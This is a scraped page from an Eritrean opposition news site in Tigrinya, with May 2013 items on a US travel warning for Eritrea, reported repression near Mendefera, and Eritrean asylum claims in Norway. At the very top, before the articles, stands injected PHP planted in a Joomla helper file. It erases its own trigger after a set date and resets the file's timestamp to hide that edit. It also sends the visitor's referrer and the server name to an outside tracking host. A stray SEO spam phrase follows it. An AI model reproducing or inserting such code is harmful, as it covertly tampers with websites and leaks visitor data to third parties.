check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } መንግስቲ ኣሜሪካ ዜጋታቱ ናብ ኤርትራ ከይገሹ ደጊሙ ኣጠንቒቑ።
кремлевская диета

መንግስቲ ኣሜሪካ ዜጋታቱ ናብ ኤርትራ ከይገሹ ደጊሙ ኣጠንቒቑ።

User Rating: / 0
PoorBest 

 

 

 

 

 

14 ግንቦት  2013

መንግስቲ ኣሜሪካ ዜጋታቱ ናብ ኤርትራ ከይገሹ ደጊሙ ኣጠንቒቑ።

ስርዓት ኢሳይያስ ዝኽተሎ ዘሎ ምንቅስቓስ በጻሕቲ ዝድርት ተግባራትን  ዘይውሑስ ጸጥታዊ ሃዋህውን ልጓም ይስእን ስለዘሎ ኣሜሪካውያን ናብ ኤርትራ ከይገሹ ክፍሊ ቆንስላዊ ጉዳያት ወጻኢ ሃገር ደጊሙ ኣጠንቒቑ ኣሎ።

መንግስቲ ኤርትራ ኣሜሪካውያን ዲፕሎማሰኛታት ዝርከቡዎም በጻሕቲ ሃገር ካብ ኣስመራ ናብ ካልእ ከባብታት ክንቀሳቐሱ እንተደልዮም ቅድሚ 10 መዓልቲ ፍቓድ ክሓቱ ዘገድዶም ኣሰራርሓ ይቕጽለሉ ከምዘሎ ዝሓበረ መግለጺ እቲ ቆንስል ኣብ ኣስመራ ዝርከብ ኤምባሲ ኣሜሪካ ህጹጽ ኣገልግሎት ዝህበሉ መሰል ኣዝዩ ተደሪቱ ምህላው ድማ ገሊጹዩ።

እቶም ታሪኻዊ ቦታታት  ንምብጻሕ ፍቓድ ዝወሃቦም ዜጋታትውን ተኾኑ ብጀካ ናብቲ ዝተመዝገበ ቦታ ኣብ ጉዕዞ ደው ክብሉ ከም ዘይፍቀደሎምውን ይጥቅስ።

ኤርትራዊ መበቆል ዘለዎም ኤርትራውያን ሃገር ንምብጻሕ ኢሎም  ኣብ ዝመጽሉ እዋን ብስርዓት ኢሳይያስ ብዘይ ምኽንያት ከም ዝእሰሩን ብዘይ ፍርዲ  ከም ዝሳቐዩን ድማ እቲ መግለጺ የነጽር።

ስርዓት ህግደፍ ካብ ዓመተ 2012 ንነጀው ጀሚሩ ክሳብ 70 ዓመት ዝዕድሚኦም ሲቪል  ዜጋታት ብረት ክዓጥቁ ኣገዲዱ ብለይቲ ከይተረፈ ንዜጋታት መንቀሳቐሲ ወረቐት ክሓትዎም ብምእዛዙ ኤርትራ ብሓፈሻ ኣስመራ ድማ ብፍላይ ብናጽነት ክትንቀሳቀሰላ ዘጸግም እቲ ዳግመ ኩነታት ተፈጢሩ ከምዘሎ ከኣ ሓቢሩ።

መንግስቲ ኣሜሪካ ኣብ ወርሒ ሕዳር ዓመተ 2012’ውን ንዜጋታቱ ተመሳሳሊ መጠንቐቕታ ሂቡ ምንባሩ ዝዝከርዩ።

---------------------------------------////////////----------------------------------

 

 

 

14 ግንቦት 2013

ምልክነት ኢሳይያስ ንህዝቢ ከባቢ መንደፈራ ብግፋ የከላብቶ ኣሎ።

ብኩለንተና ክፋእ ሃለዋት ዝተማረረ ህዝቢ ከባቢ መንደፈራ ንጽምብል 24 ግንቦት ዝኸውን ገንዘብ ከዋጽእ ምስተሓተተ ብቁጥዐ ውድብ ብዝኾነ ኣገባብ ተቃውምኡ ዘስምዐሉ ኩነት ናብ ካልኦት ከባብታት ከይሉሕኽ ከቢድ ሻቅሎት ኣኽሲቱ ምህላዉ ተፈሊጡ’ሎ።

ከም ውጽኢት ናይቲ ሰማይ ዝዓረገ ሻቅሎቱ ድማ ስርዓት ኢሳይያስ ንህዝቢ ከባቢ መንደፈራ ብኣልማማ ግፋ የከላብቶ ከምዘሎ ምንጭታት ወጋሕታ ሳሊና ዝሰደዱልና ሓበሬታ ኣረጋጊጹ’ሎ።

 ካሊእ ሕማቕ ናብራና ይኣክል ንዳንኬራ ዝኸውን ገንዘብ የብልናን ብምባል ተቃውሞኦም ዘስምዑ ነበርቲ ከባቢ መንደፈራ ብፍላይ ከኣ ነጋዶ ኣደዳ ማእሰርቲ ይኾኑ ከምዘለዉ  ተጠቂሱ’ዩ።

ህዝቢ ከባቢ መንደፈራ ንመሃያ መማሃራንን ኣገልግሎት ንዘይረኸቡሉ ቀረብ ኤሌክትሪክን ማይን ዝሕተቶ ገንዘብ እንዳንጸርጸረ ከሎ ንጽምብል 24 ግንቦት ንዳንኬራ ዝኸውን ገንዘብ ከዋጹእ ምስተሓተ ሰላማዊ ሰልፊ ብዝዓይነቱ ውዱብ ዝኾነ መገዲ ርሱን ተቃውሞ ብምስማዕ ንህግደፍ ከምዘርዓዶ ምግላጽና ዝዝከር’ዩ።

--------------------------------------////////////---------------------------------

14 ግንቦት  2013

ኣብ ኖርወይ ቑጽሪ ዑቕባ ዝሓቱ ኤርትራውያን ዝርከብዎም ስደተኛታት ብ20 ሚኢታዊት ከምዝወሰኸ ተሓቢሩ

ሬድዮ ኤረና ንክፍሊ ኢሚግሬሽን እታ ሃገር ጠቒሳ ከምዝሓበረቶ ኣብ ሃገረ ኖርወይ ብዝሒ ዑቕባ ዝሓቱ ኣሸሓት ኤርትራውያን ዝርከብዎም ስደተኛታት ብ20 ሚኢታዊት ወሰኽ ኣርእዩ’ሎ።

ኣብዘን ዝሓለፋ 4 ኣዋርሕ ጥራይ 3,310 ሓታቲ ዑቕባ ናብ ኖርወይ ከምዝኣተውን ካብዚኣቶም እቶም 15 ሚኢታዊት ኤርትራውያን ከምዝኾኑን ድማ ኣነጺሩ።

ብጀካ’ዚ ካብቶም ዑቕባ ዝሓቱ ስደተኛታት ዳርጋ ንብሙሉኦም ኤርትራውያን ፖለቲካዊ ዑቕባ ይህቦም ከም ዘሎ’ውን ተጠቒሱ’ዩ።

እዚ ከምዚሉ ከሎ እተን ስደተኛታት ዘይቕበላ ከም እስራኤል ፡ስዑዲ ዓረብ ፡ቱኒዝያን ካልኦትን ሃገራት’ውን ኣብ ጉዳይ ኤርትራውያን ሕድገታት ክገብራ ይርኣያ ከምዘለዋ እታ ሬድዮ ሓቢራ’ያ።

---------------------------------------/////////-------------------------------------

 



Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشر



Security code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player